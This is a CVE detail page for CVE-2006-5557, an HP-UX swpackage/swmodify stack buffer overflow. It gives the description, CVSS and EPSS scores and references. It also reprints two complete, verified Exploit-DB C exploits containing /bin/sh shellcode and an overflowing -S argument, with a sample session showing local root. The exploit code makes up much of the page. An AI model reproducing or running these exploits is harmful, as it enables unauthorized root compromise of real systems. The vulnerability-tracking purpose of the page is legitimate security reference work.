CVE-2006-5557 : Detail

CVE-2006-5557

0.38%V3
Local
2006-10-27
14h00 +00:00
2017-10-18
14h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Stack-based buffer overflow in the (1) swpackage and (2) swmodify commands in HP-UX B.11.11 and possibly other versions allows local users to execute arbitrary code via a long -S argument. NOTE: this might be a duplicate of CVE-2006-2574, but the details relating to CVE-2006-2574 are too vague to be certain.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 2634

Publication date : 2006-10-23 22h00 +00:00
Author : prdelka
EDB Verified : Yes

/* HP-UX swmodify buffer overflow exploit * ======================================= * HP-UX 'swmodify' contains an exploitable stack overflow * in the handling of command line arguements. Specifically the * problem occurs due to insufficent bounds checking in the "-S" * optional arguement. 'swmodify' is installed setuid root by * default in HP-UX and allows for local root compromise when * exploiting this issue. * * Example. * $ cc prdelka-vs-HPUX-swmodify.c -o prdelka-vs-HPUX-swmodify * /usr/ccs/bin/ld: (Warning) At least one PA 2.0 object file * (prdelka-vs-HPUX-swmodify.o) was detected. The linked output may * not run on a PA 1.x system. * $ uname -a * HP-UX hpux B.11.11 U 9000/785 2012383315 unlimited-user license * $ id * uid=102(user) gid=20(users) * $ ls -al /usr/sbin/swmodify * -r-sr-xr-x 2 root bin 1323008 Nov 3 2003 /usr/sbin/swmodify * $ ./prdelka-vs-HPUX-swmodify * [ HP-UX 11i 'swmodify' local root exploit * $ id * uid=0(root) gid=3(sys) euid=102(user) egid=20(users) * * - prdelka */ char shellcode[]= "\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22" "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08" "\xb4\x16\x70\x16""/bin/sh"; int main(){ char adr[4],*b,*a,*c,*envp[1]; int i; *(unsigned long*)adr=0x7f7f0434; printf("[ HP-UX 11i 'swmodify' local root exploit\n"); b=(char*)malloc(2048); a=b; memset(b,0,2048); memset(b,'a',1053); b+=1053; for(i=0;i<4;i++) *b++=adr[i%4]; *b++="A"; c=(char*)malloc(2048); b=c; memset(c,0,2048); sprintf(c,"PATH="); b+=5; for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; envp[0]=c; envp[1]=0; execle("/usr/sbin/swmodify","swmodify","-S",a,0,envp); } // milw0rm.com [2006-10-24]
Exploit Database EDB-ID : 2633

Publication date : 2006-10-23 22h00 +00:00
Author : prdelka
EDB Verified : Yes

/* HP-UX swpackage buffer overflow exploit * ======================================= * HP-UX 'swpackage' contains an exploitable stack overflow * in the handling of command line arguements. Specifically the * problem occurs due to insufficent bounds checking in the "-S" * optional arguement. 'swpackage' is installed setuid root by * default in HP-UX and allows for local root compromise when * exploiting this issue. * * Example. * $ cc prdelka-vs-HPUX-swpackage.c -o prdelka-vs-HPUX-swpackage * /usr/ccs/bin/ld: (Warning) At least one PA 2.0 object file * (prdelka-vs-HPUX-swpackage.o) was detected. The linked output may * not run on a PA 1.x system. * $ uname -a * HP-UX hpux B.11.11 U 9000/785 2012383315 unlimited-user license * $ id * uid=102(user) gid=20(users) * $ ls -al /usr/sbin/swpackage * -r-sr-xr-x 2 root bin 1323008 Nov 3 2003 /usr/sbin/swpackage * $ ./prdelka-vs-HPUX-swpackage * [ HP-UX 11i 'swpackage' local root exploit * $ id * uid=0(root) gid=3(sys) euid=102(user) egid=20(users) * * - prdelka */ char shellcode[]= "\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22" "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08" "\xb4\x16\x70\x16""/bin/sh"; int main(){ char adr[4],*b,*a,*c,*envp[1]; int i; *(unsigned long*)adr=0x7f7f0434; printf("[ HP-UX 11i 'swpackage' local root exploit\n"); b=(char*)malloc(2048); a=b; memset(b,0,2048); memset(b,'a',1053); b+=1053; for(i=0;i<4;i++) *b++=adr[i%4]; c=(char*)malloc(2048); b=c; memset(c,0,2048); sprintf(c,"PATH="); b+=5; for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; envp[0]=c; envp[1]=0; execle("/usr/sbin/swpackage","swpackage","-S",a,0,envp); } // milw0rm.com [2006-10-24]

Products Mentioned

Configuraton 0

Hp>>Hp-ux >> Version 11.00

Hp>>Hp-ux >> Version 11.4

Hp>>Hp-ux >> Version 11.11

References

http://osvdb.org/33993
Tags : vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/20706
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/2633
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/20735
Tags : vdb-entry, x_refsource_BID
http://osvdb.org/33994
Tags : vdb-entry, x_refsource_OSVDB
https://www.exploit-db.com/exploits/2634
Tags : exploit, x_refsource_EXPLOIT-DB